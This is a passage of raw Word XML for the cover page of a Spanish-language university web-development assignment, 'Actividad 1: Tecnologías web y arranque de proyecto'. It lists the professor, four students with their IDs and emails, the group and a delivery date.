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01BD" w:rsidRPr="00047EB2" w:rsidRDefault="00A101BD" w:rsidP="00A101BD">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="59570CC6" wp14:editId="7B91EB6E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-1127636</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-947296</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7837714" cy="1330036"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:wrapNone/>
            <wp:docPr id="3" name="Imagen 3" descr="cintillo_estadías_ING_ACÁMBA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ntillo_estadías_ING_ACÁMBAR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37170" cy="132994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101BD" w:rsidRDefault="00A101BD" w:rsidP="00A101BD">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:right="425" w:firstLine="284"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="4"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A101BD" w:rsidRPr="001D15B3" w:rsidRDefault="00A101BD" w:rsidP="00A101BD">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:right="425" w:firstLine="284"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="4"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D15B3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>ÁREA DE TECNOLOGÍAS DE LA INFORMACIÓN Y COMUNICACIÓN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A101BD" w:rsidRPr="001D15B3" w:rsidRDefault="00A101BD" w:rsidP="00A101BD">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:right="425" w:firstLine="284"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="4"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D15B3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>PROGRAMA ACADÉMICO DE INGENIERÍA EN TECNOLOGÍAS DE LA INFORMACIÓN Y COMUNICACIÓN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A101BD" w:rsidRPr="001D15B3" w:rsidRDefault="00A101BD" w:rsidP="00A101BD">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:right="425" w:firstLine="284"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="4"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A101BD" w:rsidRPr="00A101BD" w:rsidRDefault="00911865" w:rsidP="00A101BD">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DESARROLLO DE APLICACIONES WEB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A101BD" w:rsidRPr="001D15B3" w:rsidRDefault="00C62FB1" w:rsidP="00A101BD">
      <w:pPr>
        <w:ind w:right="425" w:firstLine="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="108"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3734EB35" wp14:editId="04303017">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2596515</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>96071</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1943100" cy="1293944"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:wrapNone/>
            <wp:docPr id="32" name="Imagen 32" descr="Resultado de imagen para administraciÃ³n de proyectos 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administraciÃ³n de proyectos I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47727" cy="129702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AB55F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="108"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ACTIVIDAD 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A101BD" w:rsidRPr="0090312E" w:rsidRDefault="00A101BD" w:rsidP="00A101BD">
      <w:pPr>
        <w:ind w:right="425" w:firstLine="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="108"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="__UnoMark__1758_931051755"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00A101BD" w:rsidRDefault="00790EB4" w:rsidP="00A101BD">
      <w:pPr>
        <w:ind w:right="425" w:firstLine="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1243965</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>220333</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2073910" cy="1322718"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="34" name="Imagen 3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relacionad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73951" cy="1322744"/>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A101BD" w:rsidRDefault="00A101BD" w:rsidP="00A101BD">
      <w:pPr>
        <w:ind w:right="425" w:firstLine="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A101BD" w:rsidRDefault="00A101BD" w:rsidP="00A101BD">
      <w:pPr>
        <w:ind w:right="425" w:firstLine="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A101BD" w:rsidRDefault="00A101BD" w:rsidP="00A101BD">
      <w:pPr>
        <w:ind w:right="425" w:firstLine="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A101BD" w:rsidRDefault="00A101BD" w:rsidP="00A101BD">
      <w:pPr>
        <w:ind w:right="425" w:firstLine="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A101BD" w:rsidRPr="001D15B3" w:rsidRDefault="00A101BD" w:rsidP="00A101BD">
      <w:pPr>
        <w:ind w:right="425" w:firstLine="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A101BD" w:rsidRPr="001D15B3" w:rsidRDefault="00AB55F9" w:rsidP="00A101BD">
      <w:pPr>
        <w:ind w:right="425" w:firstLine="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="108"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TECNOLOGÍAS WEB Y ARRANQUE DE PROYECTO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A101BD" w:rsidRPr="001D15B3" w:rsidRDefault="00A101BD" w:rsidP="00A101BD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7237"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A101BD" w:rsidRPr="001D15B3" w:rsidRDefault="00A101BD" w:rsidP="00A101BD">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D15B3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>PROFESOR:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A101BD" w:rsidRPr="001D15B3" w:rsidRDefault="00911865" w:rsidP="00A101BD">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Rodolfo Martínez Puente</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A101BD" w:rsidRPr="001D15B3" w:rsidRDefault="00A101BD" w:rsidP="00A101BD">
      <w:pPr>
        <w:ind w:right="425" w:firstLine="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D15B3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>PRESENTAN:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10169" w:type="dxa"/>
        <w:tblInd w:w="-668" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="18" w:space="0" w:color="262626" w:themeColor="text1" w:themeTint="D9"/>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="262626" w:themeColor="text1" w:themeTint="D9"/>
          <w:bottom w:val="single" w:sz="18" w:space="0" w:color="262626" w:themeColor="text1" w:themeTint="D9"/>
          <w:right w:val="single" w:sz="18" w:space="0" w:color="262626" w:themeColor="text1" w:themeTint="D9"/>
          <w:insideH w:val="single" w:sz="18" w:space="0" w:color="262626" w:themeColor="text1" w:themeTint="D9"/>
          <w:insideV w:val="single" w:sz="18" w:space="0" w:color="262626" w:themeColor="text1" w:themeTint="D9"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4499"/>
        <w:gridCol w:w="1842"/>
        <w:gridCol w:w="3828"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F731BA" w:rsidRPr="00ED3789" w:rsidTr="005702EF">
        <w:trPr>
          <w:trHeight w:val="521"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4499" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00F731BA" w:rsidRPr="00ED3789" w:rsidRDefault="00F731BA" w:rsidP="005702EF">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:right="425"/>
              <w:outlineLvl w:val="5"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED3789">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>Mayrani Reyes Galán</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1842" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00F731BA" w:rsidRPr="00ED3789" w:rsidRDefault="00F731BA" w:rsidP="005702EF">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:right="425"/>
              <w:jc w:val="center"/>
              <w:outlineLvl w:val="5"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED3789">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>15000061</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3828" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00F731BA" w:rsidRPr="00ED3789" w:rsidRDefault="00F731BA" w:rsidP="005702EF">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:right="425"/>
              <w:outlineLvl w:val="5"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED3789">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t xml:space="preserve">Mayrani.rudegirl1997@gmail.com </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F731BA" w:rsidRPr="00ED3789" w:rsidTr="005702EF">
        <w:trPr>
          <w:trHeight w:val="521"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4499" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00F731BA" w:rsidRPr="00ED3789" w:rsidRDefault="00F731BA" w:rsidP="005702EF">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:right="425"/>
              <w:outlineLvl w:val="5"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED3789">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>José Alfredo Armenta Blanco</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1842" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00F731BA" w:rsidRPr="00ED3789" w:rsidRDefault="00F731BA" w:rsidP="005702EF">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:right="425"/>
              <w:jc w:val="center"/>
              <w:outlineLvl w:val="5"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED3789">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>15001016</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3828" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00F731BA" w:rsidRPr="00ED3789" w:rsidRDefault="00F731BA" w:rsidP="005702EF">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:right="425"/>
              <w:outlineLvl w:val="5"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED3789">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>Fredie.ab@gmail.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F731BA" w:rsidRPr="00ED3789" w:rsidTr="005702EF">
        <w:trPr>
          <w:trHeight w:val="521"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4499" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00F731BA" w:rsidRPr="00ED3789" w:rsidRDefault="00F731BA" w:rsidP="005702EF">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:right="425"/>
              <w:outlineLvl w:val="5"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED3789">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>Erick Antonio Mejía Meza</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1842" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00F731BA" w:rsidRPr="00ED3789" w:rsidRDefault="00F731BA" w:rsidP="005702EF">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:right="425"/>
              <w:jc w:val="center"/>
              <w:outlineLvl w:val="5"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED3789">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>15000031</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3828" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00F731BA" w:rsidRPr="00ED3789" w:rsidRDefault="00F731BA" w:rsidP="005702EF">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:right="425"/>
              <w:outlineLvl w:val="5"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED3789">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>mejiaerick681@gmail.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F731BA" w:rsidRPr="00ED3789" w:rsidTr="005702EF">
        <w:trPr>
          <w:trHeight w:val="521"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4499" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00F731BA" w:rsidRPr="00ED3789" w:rsidRDefault="00F731BA" w:rsidP="005702EF">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:right="425"/>
              <w:outlineLvl w:val="5"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED3789">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>Andrés Moreno García</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1842" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00F731BA" w:rsidRPr="00ED3789" w:rsidRDefault="00F731BA" w:rsidP="005702EF">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:right="425"/>
              <w:jc w:val="center"/>
              <w:outlineLvl w:val="5"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED3789">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>15001266</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3828" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00F731BA" w:rsidRPr="00ED3789" w:rsidRDefault="00F731BA" w:rsidP="005702EF">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:right="425"/>
              <w:outlineLvl w:val="5"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED3789">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>andresmorgr@gmail.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A101BD" w:rsidRPr="001D15B3" w:rsidRDefault="00A101BD" w:rsidP="00A101BD">
      <w:pPr>
        <w:ind w:right="425" w:firstLine="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A101BD" w:rsidRPr="001D15B3" w:rsidRDefault="00FC1B73" w:rsidP="00A101BD">
      <w:pPr>
        <w:ind w:right="425" w:firstLine="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>ITI-9</w:t>
      </w:r>
      <w:r w:rsidR="00A101BD" w:rsidRPr="001D15B3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>01</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A101BD" w:rsidRPr="007A237E" w:rsidRDefault="00584233" w:rsidP="00A101BD">
      <w:pPr>
        <w:ind w:right="425" w:firstLine="284"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve">FECHA DE </w:t>
      </w:r>
      <w:r w:rsidR="004C1F57" w:rsidRPr="007A237E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve">ENTREGA: </w:t>
      </w:r>
      <w:r w:rsidR="007A237E" w:rsidRPr="007A237E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r w:rsidR="00A101BD" w:rsidRPr="007A237E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve"> DE </w:t>
      </w:r>
      <w:r w:rsidR="007A237E" w:rsidRPr="007A237E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>MAYO</w:t>
      </w:r>
      <w:r w:rsidR="00A101BD" w:rsidRPr="007A237E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
